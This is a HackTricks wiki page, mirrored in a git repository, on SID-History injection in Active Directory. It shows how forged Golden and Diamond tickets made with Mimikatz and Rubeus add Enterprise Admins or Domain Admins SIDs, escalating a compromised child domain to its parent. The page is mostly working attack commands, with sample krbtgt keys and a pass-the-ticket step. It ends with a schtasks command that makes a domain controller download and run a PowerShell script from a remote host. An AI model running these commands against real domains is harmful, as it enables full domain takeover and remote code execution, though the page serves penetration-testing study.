coelner/hacktricks
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
325643f5f9
hacktricks/windows-hardening/active-directory-methodology/sid-history-injection.md
carlospolop 325643f5f9 change support text
2022-09-09 13:28:04 +02:00

5.8 KiB
Raw Blame History

SID-History Injection

Support HackTricks and get benefits!

Attack

SID History was designed to support migration scenarios, where a user would be moved from one domain to another. To preserve access to resources in the "old" domain, the user's previous SID would be added to the SID History of their new account. So when creating such a ticket, the SID of a privileged group (EAs, DAs, etc) in the parent domain can be added that will grant access to all resources in the parent.

This can be achieved using either a Golden or Diamond Ticket.

For finding the SID of the "Enterprise Admins" group you can find the SID of the root domain and set it in S-1-5-21-<root domain>-519. For example, from root domain SID S-1-5-21-280534878-1496970234-700767426 the "Enterprise Admins" group SID is S-1-5-21-280534878-1496970234-700767426-519

You could also use the Domain Admins groups, which ends in 512.

Another way yo find the SID of a group of the other domain (for example "Domain Admins") is with:

Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSid

Golden Ticket (Mimikatz) with KRBTGT-AES256

mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"

/user is the username to impersonate.
/domain is the current domain.
/sid is the current domain SID.
/sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account.
/startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed.

# The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain

For more info about golden tickets check:

{% content-ref url="golden-ticket.md" %} golden-ticket.md {% endcontent-ref %}

Diamond Ticket (Rubeus + KRBTGT-AES256)

# Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap

For more info about diamond tickets check:

{% content-ref url="diamond-ticket.md" %} diamond-ticket.md {% endcontent-ref %}

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local 
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$

Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
Support HackTricks and get benefits!